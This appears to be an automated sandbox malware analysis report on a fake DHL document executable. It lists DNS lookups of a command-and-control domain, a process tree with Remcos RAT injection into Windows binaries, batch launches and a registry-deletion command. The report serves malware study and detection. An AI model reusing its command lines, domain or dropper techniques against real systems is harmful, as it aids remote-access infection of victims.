                            Sep 27, 2021 20:40:00.329817057 CEST192.168.2.48.8.8.80xaf7eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:01.487426043 CEST192.168.2.48.8.8.80x72ffStandard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:26.069981098 CEST192.168.2.48.8.8.80xd18aStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:28.191519976 CEST192.168.2.48.8.8.80x61d9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:30.296859026 CEST192.168.2.48.8.8.80x4be0Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:32.554495096 CEST192.168.2.48.8.8.80x500fStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.508255959 CEST192.168.2.48.8.8.80x5b70Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.778544903 CEST192.168.2.48.8.8.80x6992Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:36.340289116 CEST192.168.2.48.8.8.80xf6e3Standard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:37.736310959 CEST192.168.2.48.8.8.80xf757Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:39.840715885 CEST192.168.2.48.8.8.80x941cStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:42.794097900 CEST192.168.2.48.8.8.80xe14eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:44.545025110 CEST192.168.2.48.8.8.80xd5fcStandard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:47.422678947 CEST192.168.2.48.8.8.80x216Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:49.533044100 CEST192.168.2.48.8.8.80x813Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:52.200242996 CEST192.168.2.48.8.8.80x73faStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:54.499921083 CEST192.168.2.48.8.8.80x620bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:56.794174910 CEST192.168.2.48.8.8.80xf61cStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:58.999835014 CEST192.168.2.48.8.8.80xa4a5Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:01.101335049 CEST192.168.2.48.8.8.80x4f8bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:03.211925030 CEST192.168.2.48.8.8.80x4880Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:05.504503965 CEST192.168.2.48.8.8.80xd44dStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:07.787156105 CEST192.168.2.48.8.8.80xca1eStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:11.246792078 CEST192.168.2.48.8.8.80x97abStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:13.486362934 CEST192.168.2.48.8.8.80x4556Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:15.690439939 CEST192.168.2.48.8.8.80xfea6Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:17.904463053 CEST192.168.2.48.8.8.80xc846Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:20.089129925 CEST192.168.2.48.8.8.80x4bfdStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:22.204933882 CEST192.168.2.48.8.8.80x5dfdStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:24.323244095 CEST192.168.2.48.8.8.80x3c7Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:26.440473080 CEST192.168.2.48.8.8.80x6c58Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:28.589694023 CEST192.168.2.48.8.8.80xb11bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:30.934642076 CEST192.168.2.48.8.8.80x29bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:33.083949089 CEST192.168.2.48.8.8.80xf9b9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:35.215830088 CEST192.168.2.48.8.8.80x7da5Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:37.323995113 CEST192.168.2.48.8.8.80x2de7Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:39.433008909 CEST192.168.2.48.8.8.80xf6a1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:41.558228970 CEST192.168.2.48.8.8.80xc97dStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:43.668311119 CEST192.168.2.48.8.8.80xdadcStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:45.795187950 CEST192.168.2.48.8.8.80xc1b1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:48.034203053 CEST192.168.2.48.8.8.80x4ee2Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:50.154508114 CEST192.168.2.48.8.8.80xd265Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:52.264264107 CEST192.168.2.48.8.8.80x5e9bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:54.373840094 CEST192.168.2.48.8.8.80x88b9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:56.481215954 CEST192.168.2.48.8.8.80xd752Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:58.592732906 CEST192.168.2.48.8.8.80x14d1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:06.596437931 CEST192.168.2.48.8.8.80x1b36Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:08.715605974 CEST192.168.2.48.8.8.80x346aStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:10.826145887 CEST192.168.2.48.8.8.80xfb67Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Sep 27, 2021 20:40:00.377412081 CEST8.8.8.8192.168.2.40xaf7eNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:01.589236021 CEST8.8.8.8192.168.2.40x72ffNo error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:01.589236021 CEST8.8.8.8192.168.2.40x72ffNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:26.090744019 CEST8.8.8.8192.168.2.40xd18aNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:28.212397099 CEST8.8.8.8192.168.2.40x61d9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:30.310684919 CEST8.8.8.8192.168.2.40x4be0No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:32.567531109 CEST8.8.8.8192.168.2.40x500fNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.522198915 CEST8.8.8.8192.168.2.40x5b70No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.861727953 CEST8.8.8.8192.168.2.40x6992No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:36.441093922 CEST8.8.8.8192.168.2.40xf6e3No error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:36.441093922 CEST8.8.8.8192.168.2.40xf6e3No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:37.749092102 CEST8.8.8.8192.168.2.40xf757No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:39.854439974 CEST8.8.8.8192.168.2.40x941cNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:42.857904911 CEST8.8.8.8192.168.2.40xe14eNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:44.717713118 CEST8.8.8.8192.168.2.40xd5fcNo error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:44.717713118 CEST8.8.8.8192.168.2.40xd5fcNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:47.445765018 CEST8.8.8.8192.168.2.40x216No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:49.554491997 CEST8.8.8.8192.168.2.40x813No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:52.234039068 CEST8.8.8.8192.168.2.40x73faNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:54.513664007 CEST8.8.8.8192.168.2.40x620bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:56.808721066 CEST8.8.8.8192.168.2.40xf61cNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:59.013353109 CEST8.8.8.8192.168.2.40xa4a5No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:01.114439011 CEST8.8.8.8192.168.2.40x4f8bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:03.235649109 CEST8.8.8.8192.168.2.40x4880No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:05.526628971 CEST8.8.8.8192.168.2.40xd44dNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:07.801413059 CEST8.8.8.8192.168.2.40xca1eNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:11.259496927 CEST8.8.8.8192.168.2.40x97abNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:13.499980927 CEST8.8.8.8192.168.2.40x4556No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:15.703810930 CEST8.8.8.8192.168.2.40xfea6No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:17.924951077 CEST8.8.8.8192.168.2.40xc846No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:20.102364063 CEST8.8.8.8192.168.2.40x4bfdNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:22.218985081 CEST8.8.8.8192.168.2.40x5dfdNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:24.335789919 CEST8.8.8.8192.168.2.40x3c7No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:26.453758955 CEST8.8.8.8192.168.2.40x6c58No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:28.603553057 CEST8.8.8.8192.168.2.40xb11bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:30.956043959 CEST8.8.8.8192.168.2.40x29bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:33.111673117 CEST8.8.8.8192.168.2.40xf9b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:35.228498936 CEST8.8.8.8192.168.2.40x7da5No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:37.337399006 CEST8.8.8.8192.168.2.40x2de7No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:39.455291986 CEST8.8.8.8192.168.2.40xf6a1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:41.570872068 CEST8.8.8.8192.168.2.40xc97dNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:43.690537930 CEST8.8.8.8192.168.2.40xdadcNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:45.808367014 CEST8.8.8.8192.168.2.40xc1b1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:48.047791004 CEST8.8.8.8192.168.2.40x4ee2No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:50.166790962 CEST8.8.8.8192.168.2.40xd265No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:52.277652025 CEST8.8.8.8192.168.2.40x5e9bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:54.386415005 CEST8.8.8.8192.168.2.40x88b9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:56.493730068 CEST8.8.8.8192.168.2.40xd752No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:58.606566906 CEST8.8.8.8192.168.2.40x14d1No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:06.612971067 CEST8.8.8.8192.168.2.40x1b36No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:08.729338884 CEST8.8.8.8192.168.2.40x346aNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:10.839230061 CEST8.8.8.8192.168.2.40xfb67No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)

                            Code Manipulations

                            Statistics

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe PID: 6548 Parent PID: 5324

                            General

                            Start time:20:39:57
                            Start date:27/09/2021
                            Path:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low

                            Analysis Process: mobsync.exe PID: 1368 Parent PID: 6548

                            General

                            Start time:20:40:20
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation:moderate

                            Analysis Process: cmd.exe PID: 7156 Parent PID: 6548

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: conhost.exe PID: 5192 Parent PID: 7156

                            General

                            Start time:20:40:25
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: cmd.exe PID: 6852 Parent PID: 7156

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: conhost.exe PID: 1852 Parent PID: 6852

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: cmd.exe PID: 5048 Parent PID: 6548

                            General

                            Start time:20:40:26
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
                            Imagebase:0x11d0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: conhost.exe PID: 5744 Parent PID: 5048

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: reg.exe PID: 1680 Parent PID: 5048

                            General

                            Start time:20:40:27
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:reg delete hkcu\Environment /v windir /f
                            Imagebase:0x310000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: conhost.exe PID: 5508 Parent PID: 1680

                            General

                            Start time:20:40:28
                            Start date:27/09/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff724c50000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: Iqzenco.exe PID: 7112 Parent PID: 3424

                            General

                            Start time:20:40:31
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Antivirus matches:
                            • Detection: 24%, ReversingLabs

                            Analysis Process: Iqzenco.exe PID: 484 Parent PID: 3424

                            General

                            Start time:20:40:39
                            Start date:27/09/2021
                            Path:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Wow64 process (32bit):true
                            Commandline:'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
                            Imagebase:0x400000
                            File size:1009152 bytes
                            MD5 hash:3808D4A11CBEE20896CCA28F9A3BCB9B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi

                            Analysis Process: mobsync.exe PID: 4108 Parent PID: 7112

                            General

                            Start time:20:40:59
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\mobsync.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\mobsync.exe
                            Imagebase:0x9d0000
                            File size:93184 bytes
                            MD5 hash:44C19378FA529DD88674BAF647EBDC3C
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, Author: Joe Security

                            Analysis Process: secinit.exe PID: 6644 Parent PID: 484

                            General

                            Start time:20:41:16
                            Start date:27/09/2021
                            Path:C:\Windows\SysWOW64\secinit.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\secinit.exe
                            Imagebase:0xb40000
                            File size:9728 bytes
                            MD5 hash:174A363BB5A2D88B224546C15DD10906
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, Author: unknown
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, Author: Joe Security

                            Disassembly

                            Code Analysis

                            Reset < >